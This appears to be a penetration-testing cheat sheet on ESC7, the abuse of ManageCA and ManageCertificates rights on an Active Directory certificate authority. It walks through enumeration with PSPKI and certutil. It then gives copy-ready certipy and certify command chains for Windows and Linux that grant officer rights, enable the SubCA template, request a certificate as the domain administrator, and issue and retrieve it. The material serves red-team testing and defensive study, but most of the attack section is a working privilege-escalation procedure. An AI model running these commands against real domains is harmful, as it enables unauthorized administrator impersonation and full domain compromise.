Skip to main content

ESC7

Vulnerable Certificate Authority Access Control where 2 sets of permissions poses security risks:

  • ManageCA (or ManageCertificates)
  • ManageCertificates (or Certificate Manager)

Enumerate using certsrv.msc

PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.domain.local | Get-CertificationAuthorityAcl | select -expand Access

Query CA with certutil (EditFlags value)

Check if EDITF_ATTRIBUTESUBJECTALTNAME2 is set if the value is 1376590.

PS /home/bobbuilder> certutil.exe -config "LAB-DC.lab.local\lab-LAB-DC-CA" -getreg "policy\EditFlags"

Enumerate using PSPKI module

PS /home/bobbuilder> Import-Module .\PSPKI.ps1
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName LAB-DC.lab.local | Get-CertificationAuthorityAcl | select -ExpandProperty access

Windows

Attack 1 (Allow SAN by flipping EDITF_ATTRIBUTESUBJECTALTNAME2)

Templates with ManageCA enables the principal to manipulate settings remotely using PSPKI by toggling the EDITF_ATTRIBUTESUBJECTALTNAME2 flag (just like with ESC6). This allows SAN specification in any template. The ESC6 attack got patch on May of 2022, so Attack #2 might be a better alternative if it's the case.

Note: this will not have any effect until the CA service (CertSvc) is restarted which ManageCA users have but they can't do it remotely.

  1. Request Certificate Template
PS /home/bobbuilder> certify.exe request /ca:<ca> /template:ApprovalNeeded
  1. Import PSPKI module
Import-Module PSPKI
  1. Approve Pending Request
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.domain.local | Get-PendingRequest -RequestID 336 | Approve-CertificateRequest
  1. Download Pending Request
PS /home/bobbuilder> certify.exe download /ca:<ca> /id:336
Post Attack

Disable EDITF_ATTRIBUTESUBJECTALTNAME2 with PowerShell

$ConfigReader.SetConfigEntry(1114446,"EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy") $ConfigReader.GetConfigEntry("EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")

Attack 2 (gain ManageCertificates right using ManageCA)

For this attack we only need ManageCA permission. We will need Manage Certificates permission and SubCA Certificate template enabled but they both can be enabled from ManageCA

  1. Grant Manage Certificates access (Optional, if we don't already)
certipy ca -ca 'corp-DC-CA' -add-officer john -username john@corp.local -password Passw0rd
  1. Enable SubCA Certificate template (Optional, The SubCA template is enabled by default)
certipy ca -username john@corp.local -password Passw0rd! -target-ip ca.corp.local -ca 'corp-CA' -enable-template 'SubCA'
  1. Request certificate based on the SubCA template
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -template SubCA -upn administrator@corp.local
  1. Issue the failed certificate
certipy ca -ca 'corp-DC-CA' -issue-request 785 -username john@corp.local -password Passw0rd
  1. Retrieve the issued certificate
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -retrieve 785

Linux

Attack 1 (ManageCA rights)

  1. Add Manage Certificates Access rights to BlWasp
certipy ca -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -add-officer BlWasp
  1. Requesting a certificate with SAN (Enrollee Supplies Subject : True)
certipy req -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -template SubCA -upn Administrator
  1. Issue the certificate
certipy ca -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -issue-request 31
  1. Retrieve the certificate with the ID to authenticate using it
certipy req -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -retrieve 31

Attack 2 (ManageCertificates rights)

  1. Request a certificate with the manager's approval
certipy req -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -template ESC7_1 -upn Administrator
  1. Approve pending request
certipy ca -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -issue-request 59
  1. Retrieve approved request
certipy req -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -retrieve 59